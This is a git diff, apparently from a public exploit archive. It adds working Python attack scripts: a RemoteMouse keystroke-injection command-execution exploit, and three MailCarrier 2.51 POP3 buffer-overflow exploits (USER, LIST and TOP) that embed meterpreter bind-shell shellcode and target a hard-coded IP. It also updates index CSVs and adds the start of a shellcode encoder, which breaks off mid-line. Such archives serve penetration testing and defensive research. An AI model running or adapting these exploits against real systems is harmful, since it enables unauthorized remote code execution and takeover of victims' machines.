MoveMouse(x,y,ip): + def SendMouse(command,times,ip): + for x in range(times): + target = socket(AF_INET, SOCK_DGRAM) + target.sendto(command,(ip,1978)) + sleep(0.001) + if x>0: + command="mos 5m 1 0" + SendMouse(command,x,ip) + elif x<0: + x=x*-1 + command="mos 5m -1 0" + SendMouse(command,x,ip) + if y>0: + command="mos 5m 0 1" + SendMouse(command,y,ip) + elif y<0: + y=y*-1 + command="mos 6m 0 -1" + SendMouse(command,y,ip) + + + +def MousePress(command,ip,action="click"): + if action=="down": + target = socket(AF_INET, SOCK_DGRAM) + target.sendto((command+" d"),(ip,1978)) + elif action=="up": + target = socket(AF_INET, SOCK_DGRAM) + target.sendto((command+" u"),(ip,1978)) + elif action=="click": + target = socket(AF_INET, SOCK_DGRAM) + target.sendto((command+" d"),(ip,1978)) + target.sendto((command+" u"),(ip,1978)) + else: raise Exception('MousePress: No action named "'+str(action)+'"') + + +def SendString(string,ip): + for char in string: + target = socket(AF_INET, SOCK_DGRAM) + target.sendto(characters[char],(ip,1978)) + + + +class mouse: + leftClick="mos 5R l" + rightClick="mos 5R r" + middleClick="mos 5R m" + +characters={ + "A":"key 8[ras]116", "B":"key 8[ras]119", "C":"key 8[ras]118", "D":"key 8[ras]113", "E":"key 8[ras]112", + "F":"key 8[ras]115", "G":"key 8[ras]114", "H":"key 8[ras]125", "I":"key 8[ras]124", "J":"key 8[ras]127", + "K":"key 8[ras]126", "L":"key 8[ras]121", "M":"key 8[ras]120", "N":"key 8[ras]123", "O":"key 8[ras]122", + "P":"key 8[ras]101", "Q":"key 8[ras]100", "R":"key 8[ras]103", "S":"key 8[ras]102", "T":"key 7[ras]97", + "U":"key 7[ras]96", "V":"key 7[ras]99", "W":"key 7[ras]98", "X":"key 8[ras]109", "Y":"key 8[ras]108", + "Z":"key 8[ras]111", + + "a":"key 7[ras]84", "b":"key 7[ras]87", "c":"key 7[ras]86", "d":"key 7[ras]81", "e":"key 7[ras]80", + "f":"key 7[ras]83", "g":"key 7[ras]82", "h":"key 7[ras]93", "i":"key 7[ras]92", "j":"key 7[ras]95", + "k":"key 7[ras]94", "l":"key 7[ras]89", "m":"key 7[ras]88", "n":"key 7[ras]91", "o":"key 7[ras]90", + "p":"key 7[ras]69", "q":"key 7[ras]68", "r":"key 7[ras]71", "s":"key 7[ras]70", "t":"key 7[ras]65", + "u":"key 7[ras]64", "v":"key 7[ras]67", "w":"key 7[ras]66", "x":"key 7[ras]77", "y":"key 7[ras]76", + "z":"key 7[ras]79", + + "1":"key 6[ras]4", "2":"key 6[ras]7", "3":"key 6[ras]6", "4":"key 6[ras]1", "5":"key 6[ras]0", + "6":"key 6[ras]3", "7":"key 6[ras]2", "8":"key 6[ras]13", "9":"key 6[ras]12", "x0":"key 6[ras]5", + + "\n":"key 3RTN", "\b":"key 3BAS", " ":"key 7[ras]21", + + "+":"key 7[ras]30", "=":"key 6[ras]8", "/":"key 7[ras]26", "_":"key 8[ras]106", "<":"key 6[ras]9", + ">":"key 7[ras]11", "[":"key 8[ras]110", "]":"key 8[ras]104", "!":"key 7[ras]20", "@":"key 8[ras]117", + "#":"key 7[ras]22", "$":"key 7[ras]17", "%":"key 7[ras]16", "^":"key 8[ras]107", "&":"key 7[ras]19", + "*":"key 7[ras]31", "(":"key 7[ras]29", ")":"key 7[ras]28", "-":"key 7[ras]24", "'":"key 7[ras]18", + '"':"key 7[ras]23", ":":"key 7[ras]15", ";":"key 7[ras]14", "?":"key 7[ras]10", "`":"key 7[ras]85", + "~":"key 7[ras]75", "\\":"key 8[ras]105", "|":"key 7[ras]73", "{":"key 7[ras]78", "}":"key 7[ras]72", + ",":"key 7[ras]25", ".":"key 7[ras]27" +} + + +def PopCalc(ip): + MoveMouse(-5000,3000,ip) + MousePress(mouse.leftClick,ip) + sleep(1) + SendString("calc.exe",ip) + sleep(1) + SendString("\n",ip) + print("SUCCESS! Process calc.exe has run on target",ip) + + +def main(): + try: + targetIP=argv[1] + except: + print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1") + exit() + if Ping(targetIP)==True: + PopCalc(targetIP) + else: + print("ERROR: Target machine is not running RemoteMouse") + exit() + +if __name__=="__main__": + main() \ No newline at end of file diff --git a/exploits/windows/remote/46699.py b/exploits/windows/remote/46699.py new file mode 100755 index 000000000..3a5981651 --- /dev/null +++ b/exploits/windows/remote/46699.py @@ -0,0 +1,60 @@ +#!/usr/bin/python +# Exploit Title: MailCarrier 2.51 - Remote Buffer Overflow in "USER" command(POP3) +# Date: 14/04/2019 +# Exploit Author: Dino Covotsos - Telspace Systems +# Vendor Homepage: https://www.tabslab.com/ +# Version: 2.51 +# Software Link: N.A +# Contact: services[@]telspace.co.za +# Twitter: @telspacesystems (Greets to the Telspace Crew) +# Tested on: Windows XP Prof SP3 ENG x86 +# CVE: TBC from Mitre +# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite +# POC +# 1.) Change ip and port in code +# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine +# 0x1b023059 : push esp # ret 0x10 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll) +# Badchars \x00\xd9 + +import sys +import socket +import time + +#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -b "\x00\xd9" -f c +shellcode = ("\x29\xc9\x83\xe9\xb2\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e" +"\x44\x9b\x1b\x0b\x83\xee\xfc\xe2\xf4\xb8\x73\x99\x0b\x44\x9b" +"\x7b\x82\xa1\xaa\xdb\x6f\xcf\xcb\x2b\x80\x16\x97\x90\x59\x50" +"\x10\x69\x23\x4b\x2c\x51\x2d\x75\x64\xb7\x37\x25\xe7\x19\x27" +"\x64\x5a\xd4\x06\x45\x5c\xf9\xf9\x16\xcc\x90\x59\x54\x10\x51" +"\x37\xcf\xd7\x0a\x73\xa7\xd3\x1a\xda\x15\x10\x42\x2b\x45\x48" +"\x90\x42\x5c\x78\x21\x42\xcf\xaf\x90\x0a\x92\xaa\xe4\xa7\x85" +"\x54\x16\x0a\x83\xa3\xfb\x7e\xb2\x98\x66\xf3\x7f\xe6\x3f\x7e" +"\xa0\xc3\x90\x53\x60\x9a\xc8\x6d\xcf\x97\x50\x80\x1c\x87\x1a" +"\xd8\xcf\x9f\x90\x0a\x94\x12\x5f\x2f\x60\xc0\x40\x6a\x1d\xc1" +"\x4a\xf4\xa4\xc4\x44\x51\xcf\x89\xf0\x86\x19\xf3\x28\x39\x44" +"\x9b\x73\x7c\x37\xa9\x44\x5f\x2c\xd7\x6c\x2d\x43\x64\xce\xb3" +"\xd4\x9a\x1b\x0b\x6d\x5f\x4f\x5b\x2c\xb2\x9b\x60\x44\x64\xce" +"\x61\x4f\xc2\x4b\xe9\xb9\xf1\x1a\x61\x46\xf3\xf1\x04\x9b\x7b" +"\xe4\xde\xd3\xf3\x19\x0b\x45\x20\x92\xed\x2e\x8b\x4d\x5c\x2c" +"\x59\xc0\x3c\x23\x64\xce\x8e\x84\xee\x43\x5c\x2c\x2c\xf2\x33" +"\xbb\x64\xce\x5c\x2c\xef\xf7\x30\xa5\x64\xce\x5c\xd3\xf3\x6e" +"\x65\x09\xfa\xe4\xde\x2e\x9b\x71\x0f\x12\xcc\x73\x09\x9d\x53" +"\x44\xf4\x91\x18\xe3\x0b\x3a\xb6\x90\x3d\x2e\xdb\x73\x0b\x54" +"\x9b\x1b\x5d\x2e\x9b\x73\x53\xe0\xc8\xfe\xf4\x91\x08\x48\x61" +"\x44\xcd\x48\x5c\x2c\x99\xc2\xc3\x1b\x64\xce\x88\xbc\x9b\x65" +"\x0c\x45\x58\x32\xcd\x31\x72\xd8\xb0\xb4\x2e\xb9\x5d\x2e\x9b" +"\x48\xf4\x91\x9b\x1b\x0b") + +buffer = "A" * 5094 + "\x59\x30\x02\x1b" + "\x90" * 20 + shellcode + "C" * (882-len(shellcode)) + +print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n" +print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +connect=s.connect(("192.168.0.150", 110)) +print s.recv(1024) +s.send('USER ' + buffer + '\r\n') +print s.recv(1024) +s.send('QUIT\r\n') +s.close() +time.sleep(1) +print "[*] Done, but if you get here the exploit failed!" \ No newline at end of file diff --git a/exploits/windows/remote/46700.py b/exploits/windows/remote/46700.py new file mode 100755 index 000000000..67933c963 --- /dev/null +++ b/exploits/windows/remote/46700.py @@ -0,0 +1,89 @@ +#!/usr/bin/python +# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "LIST" command(POP3) +# Date: 14/04/2019 +# Exploit Author: Dino Covotsos - Telspace Systems +# Vendor Homepage: https://www.tabslab.com/ +# Version: 2.51 +# Software Link: N.A +# Contact: services[@]telspace.co.za +# Twitter: @telspacesystems (Greets to the Telspace Crew) +# Tested on: Windows XP Prof SP3 ENG x86 +# CVE: TBC from Mitre +# Created for the Telspace Internship 2019 - SEH Exploit +# POC +# 1.) Change ip, username, password and port in code +# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine +#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll) +#nseh 6178 seh 6182 +import sys +import socket +import time + +#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c +shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f" +"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50" +"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63" +"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f" +"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69" +"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72" +"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e" +"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61" +"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33" +"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b" +"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46" +"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53" +"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70" +"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b" +"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c" +"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64" +"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59" +"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b" +"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33" +"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c" +"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33" +"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38" +"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74" +"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a" +"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48" +"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69" +"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59" +"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45" +"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b" +"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71" +"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52" +"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44" +"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79" +"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b" +"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75" +"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43" +"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66" +"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f" +"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67" +"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b" +"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69" +"\x6f\x78\x55\x41\x41") + +buffer = "A" * 6174 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (3798-(len(shellcode))) + +print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n" +print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +connect=s.connect(("192.168.0.150", 110)) +print s.recv(1024) +print "[*] Sending USERNAME\r\n" +s.send('USER test' + '\r\n') +print s.recv(1024) +print "[*] Sending PASSWORD\r\n" +s.send('PASS test' + '\r\n') +print s.recv(1024) +print "[*] Sending Evil LIST buffer\r\n" +s.send('LIST ' + buffer + '\r\n') +print s.recv(1024) +s.send('QUIT\r\n') +s.close() +time.sleep(1) +print "[*] Done, but if you get here the exploit failed!" \ No newline at end of file diff --git a/exploits/windows/remote/46701.py b/exploits/windows/remote/46701.py new file mode 100755 index 000000000..e4a5b0b75 --- /dev/null +++ b/exploits/windows/remote/46701.py @@ -0,0 +1,88 @@ +#!/usr/bin/python +# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "TOP" command(POP3) +# Date: 14/04/2019 +# Exploit Author: Dino Covotsos - Telspace Systems +# Vendor Homepage: https://www.tabslab.com/ +# Version: 2.51 +# Software Link: N.A +# Contact: services[@]telspace.co.za +# Twitter: @telspacesystems (Greets to the Telspace Crew) +# Tested on: Windows XP Prof SP3 ENG x86 +# CVE: TBC from Mitre +# Created for the Telspace Internship 2019 - SEH Exploit +# POC +# 1.) Change ip, username, password and port in code +# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine +#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll) +#crash at 6175 +import sys +import socket +import time + +#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c +shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f" +"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50" +"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63" +"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f" +"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69" +"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72" +"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e" +"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61" +"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33" +"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b" +"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46" +"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53" +"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70" +"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b" +"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c" +"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64" +"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59" +"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b" +"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33" +"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c" +"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33" +"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38" +"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74" +"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a" +"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48" +"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69" +"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59" +"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45" +"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b" +"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71" +"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52" +"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44" +"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79" +"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b" +"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75" +"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43" +"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66" +"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f" +"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67" +"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b" +"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69" +"\x6f\x78\x55\x41\x41") + +buffer = "A" * 6175 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (10000-6883) + +print "[*] Mail Server 2.51 POP3 Buffer Overflow in TOP command\r\n" +print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +connect=s.connect(("192.168.0.150", 110)) +print s.recv(1024) +print "[*] Sending USERNAME\r\n" +s.send('USER test' + '\r\n') +print s.recv(1024) +print "[*] Sending PASSWORD\r\n" +s.send('PASS test' + '\r\n') +print s.recv(1024) +print "[*] Sending TOP command plus evil buffer\r\n" +s.send('TOP ' + buffer + '\r\n') +s.send('QUIT\r\n') +s.close() +time.sleep(1) +print "[*] Done, check for meterpreter shell on port 443 of the target!" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 3876a3306..23a9ef4e4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6382,6 +6382,8 @@ id,file,description,date,author,type,platform,port 46652,exploits/multiple/dos/46652.txt,"Google Chrome 72.0.3626.81 - 'V8TrustedTypePolicyOptions::ToImpl' Type Confusion",2019-04-03,"Google Security Research",dos,multiple, 46653,exploits/multiple/dos/46653.html,"Google Chrome 73.0.3683.39 / Chromium 74.0.3712.0 - 'ReadableStream' Internal Object Leak Type Confusion",2019-04-03,"Google Security Research",dos,multiple, 46656,exploits/windows/dos/46656.py,"Magic ISO Maker 5.5(build 281) - 'Serial Code' Denial of Service (PoC)",2019-04-04,"Alejandra Sánchez",dos,windows, +46702,exploits/windows/dos/46702.py,"UltraVNC Viewer 1.2.2.4 - 'VNC Server' Denial of Service (PoC)",2019-04-15,"Victor Mondragón",dos,windows, +46703,exploits/windows/dos/46703.py,"UltraVNC Launcher 1.2.2.4 - 'Path' Denial of Service (PoC)",2019-04-15,"Victor Mondragón",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -17315,6 +17317,13 @@ id,file,description,date,author,type,platform,port 46678,exploits/hardware/remote/46678.py,"TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow",2019-04-09,"Grzegorz Wypych",remote,hardware,80 46682,exploits/multiple/remote/46682.py,"Apache Axis 1.4 - Remote Code Execution",2019-04-09,"David Yesland",remote,multiple, 46693,exploits/linux/remote/46693.rb,"Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)",2019-04-12,Metasploit,remote,linux,8443 +46695,exploits/windows/remote/46695.py,"MailCarrier 2.51 - 'RCPT TO' Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,25 +46697,exploits/windows/remote/46697.py,"RemoteMouse 3.008 - Arbitrary Remote Command Execution",2019-04-15,0rphon,remote,windows, +46698,exploits/php/remote/46698.rb,"CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)",2019-04-15,AkkuS,remote,php, +46699,exploits/windows/remote/46699.py,"MailCarrier 2.51 - POP3 'USER' Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110 +46700,exploits/windows/remote/46700.py,"MailCarrier 2.51 - POP3 'LIST' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110 +46701,exploits/windows/remote/46701.py,"MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110 +46705,exploits/hardware/remote/46705.rb,"Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)",2019-04-15,Metasploit,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41116,6 +41125,7 @@ id,file,description,date,author,type,platform,port 46643,exploits/php/webapps/46643.txt,"Ashop Shopping Cart Software - SQL Injection",2019-04-03,"Ahmet Ümit BAYRAM",webapps,php,80 46644,exploits/php/webapps/46644.txt,"PhreeBooks ERP 5.2.3 - Arbitrary File Upload",2019-04-03,"Abdullah Çelebi",webapps,php,80 46658,exploits/php/webapps/46658.py,"FreeSMS 2.1.2 - SQL Injection (Authentication Bypass)",2019-04-04,"Yilmaz Degirmenci",webapps,php,80 +46659,exploits/jsp/webapps/46659.py,"Manage Engine ServiceDesk Plus 10.0 - Privilege Escalation",2019-04-05,"Ata Hakçıl_ Melih Kaan Yıldız",webapps,jsp, 46661,exploits/php/webapps/46661.html,"WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery",2019-04-05,"Peyman Forouzan",webapps,php, 46663,exploits/php/webapps/46663.txt,"Jobgator - 'experience' SQL Injection",2019-04-08,"Ahmet Ümit BAYRAM",webapps,php,80 46664,exploits/php/webapps/46664.html,"Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution",2019-04-08,FelipeGaspar,webapps,php,80 @@ -41129,3 +41139,4 @@ id,file,description,date,author,type,platform,port 46684,exploits/php/webapps/46684.py,"Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Unauthenticated Remote Code Execution",2019-04-10,"Julien Ahrens",webapps,php,443 46687,exploits/hardware/webapps/46687.txt,"D-Link DI-524 V2.06RU - Multiple Cross-Site Scripting",2019-04-10,"Semen Alexandrovich Lyhin",webapps,hardware,80 46691,exploits/php/webapps/46691.rb,"ATutor < 2.2.4 - 'file_manager' Remote Code Execution (Metasploit)",2019-04-12,AkkuS,webapps,php, +46694,exploits/php/webapps/46694.txt,"DirectAdmin 1.561 - Multiple Vulnerabilities",2019-04-15,InfinitumIT,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index b5d930617..50c4f5635 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -955,3 +955,5 @@ id,file,description,date,author,type,platform 46679,shellcodes/generator/46679.nasm,"Linux/x64 - XANAX Encoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator 46680,shellcodes/generator/46680.nasm,"Linux/x64 - XANAX Decoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator 46689,shellcodes/linux_x86/46689.c,"Linux/x86 - Add User (sshd/root) to Passwd File Shellcode (149 bytes)",2019-04-12,strider,shellcode,linux_x86 +46696,shellcodes/generator/46696.py,"Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes)",2019-04-15,"Petr Javorik",shellcode,generator +46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86 diff --git a/shellcodes/generator/46696.py b/shellcodes/generator/46696.py new file mode 100755 index 000000000..007d62403 --- /dev/null +++ b/shellcodes/generator/46696.py @@ -0,0 +1,109 @@ +################################################################################ +INTRO +################################################################################ + +# Exploit Title: MMX-PUNPCKLBW Encoder +# Description: Payload encoder using MMX PUNPCKLBW instruction +# Date: 13/04/2019 +# Exploit Author: Petr Javorik +# Tested on: Linux ubuntu 3.13.0-32-generic x86 +# Shellcode length: 61 + +################################################################################ +ENCODER +################################################################################ + +#!/usr/bin/env python + +# stack execve +SHELLCODE = bytearray( + b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' +) + +# Align to qword multiples +missing_bytes = 8 - (len(SHELLCODE) % 8) +padding = [0x90 for _ in range(missing_bytes)] +SHELLCODE.extend(padding) + +# Shuffle payload +shuffled_payload = [] +# First byte carries count of needed PUNPCKLBW loops +loop_count = len(SHELLCODE)//8 +shuffled_payload.append(loop_count) +for block_num in range(0, loop_count): + current_block = SHELLCODE[(8 * block_num) : (8 * block_num + 8)] + shuffled_block = [current_block[i] for i in [0, 2, 4, 6, 1, 3, 5, 7]] + shuffled_payload.extend(shuffled_block) + +# Remove trailing NOPS +for byte in shuffled_payload[::-1]: + if byte == 0x90: + del shuffled_payload[-1] + else: + break + +# Print shellcode +print('Payload length: {}'.format(len(shuffled_payload))) +print('\\x' + 